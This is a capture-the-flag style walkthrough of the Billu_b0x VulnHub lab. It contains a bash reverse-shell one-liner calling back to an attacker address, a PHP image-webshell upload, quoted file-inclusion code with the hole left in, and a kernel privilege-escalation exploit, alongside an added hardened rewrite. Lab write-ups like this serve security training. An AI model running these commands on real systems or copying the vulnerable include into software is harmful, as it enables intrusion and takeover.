Billu_b0x test

Hands-on test

Network: NET host mode
Goal of the exercise: obtain root privileges (hint: start from the web application)
Project location: https://www.vulnhub.com/entry/billu-b0x,188/

Host discovery

root@kali:~# arp-scan -l

root@kali:~# nmap -T4 -A -v 192.168.67.138
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 fa:cf:a2:52:c4:fa:f5:75:a7:e2:bd:60:83:3e:7b:de (DSA)
| 2048 88:31:0c:78:98:80:ef:33:fa:26:22:ed:d0:9b:ba:f8 (RSA)
|_ 256 0e:5e:33:03:50:c9:1e:b3:e7:51:39:a4:4a:10:64:ca (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: --==[[IndiShell Lab]]==--

Gaining access

The hint points to SQL injection, and injection in the POST parameters was the first thing tried, but it led nowhere.
Brute-forcing directories

root@kali:~# dirb http://192.168.67.138 /usr/share/dirb/wordlists/big.txt

http://192.168.67.138/add # file upload, no echo
http://192.168.67.138/in # phpinfo
http://192.168.67.138/test # hint of a file inclusion

Downloading the source

A GET request gives nothing; use a POST request.
From passwd, the users ica and root can log in over SSH.
Download c.php and find the MySQL account and password:

billu
B0x_billu

Log in at http://192.168.67.138
A new upload point is discovered.
The file content is checked, so simply renaming the file is not enough; upload an image webshell (an image with PHP appended):

copy 1.jpg/b+1.php 2.jpg

Go to http://192.168.67.138/uploaded_images/
Analysing panel.php shows that it contains a file inclusion:

<?php
// Excerpt from panel.php: the vulnerable dispatch code as found on the box.
if(isset($_POST['continue']))
{
$dir=getcwd();
// Only "./" is stripped, and only in $choice; the raw $_POST['load'] is kept.
$choice=str_replace('./','',$_POST['load']);

if($choice==='add')
{
include($dir.'/'.$choice.'.php');
die();
}

if($choice==='show')
{

include($dir.'/'.$choice.'.php');
die();
}
else
{
// Any other value is included verbatim: a local file inclusion.
include($dir.'/'.$_POST['load']);
}
}
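As an added example, not code from the original panel.php or from this writeup, here is how the same `load` dispatch can be written so that the inclusion is no longer reachable with a user-controlled path; it assumes add.php and show.php are the only legitimate pages and that panel.php sits in the same directory.

```php
<?php
// Added example (not the original panel.php): a hardened version of the
// "load" dispatch. The request value is only ever used as a key into a fixed
// allowlist, never concatenated into the include path, so "../", "php://"
// or absolute paths have no effect regardless of how they are encoded.

// Assumption: these are the only pages the panel is meant to load.
const ALLOWED_PAGES = [
    'add'  => 'add.php',
    'show' => 'show.php',
];

/**
 * Map a requested page name to a file under $baseDir, or return null.
 */
function resolve_page(string $requested, string $baseDir): ?string
{
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;                        // not an allowlisted page name
    }
    $path = realpath($baseDir . '/' . ALLOWED_PAGES[$requested]);
    $base = realpath($baseDir);
    // Defence in depth: even an allowlisted entry must resolve inside $baseDir.
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

if (isset($_POST['continue'])) {
    $page = resolve_page((string)($_POST['load'] ?? ''), __DIR__);
    if ($page === null) {
        // Reject and log the attempt; the raw value is useful for detection.
        http_response_code(400);
        error_log('panel: rejected load=' . var_export($_POST['load'] ?? null, true));
        exit('Invalid page');
    }
    include $page;
    exit;
}
```

With this version, a request such as the uploaded-image path used in this writeup is refused before include() runs, and the rejection is written to the web server's error log.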


Reverse shell

URL-encode the following:

echo "bash -i >& /dev/tcp/192.168.67.1/4444 0>&1" | bash

www-data@indishell:/var/www$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege escalation

uname -a # check the kernel version
cat /etc/issue # display the system version

Use a local privilege escalation exploit
Download it locally

chmod 777 37292.c # grant permissions
gcc 37292.c -o test # compile

Run it

www-data@indishell:/tmp$ ./test

That's all.

If anything is wrong, please contact [email protected]

Source: www.cnblogs.com/petewell/p/11597654.html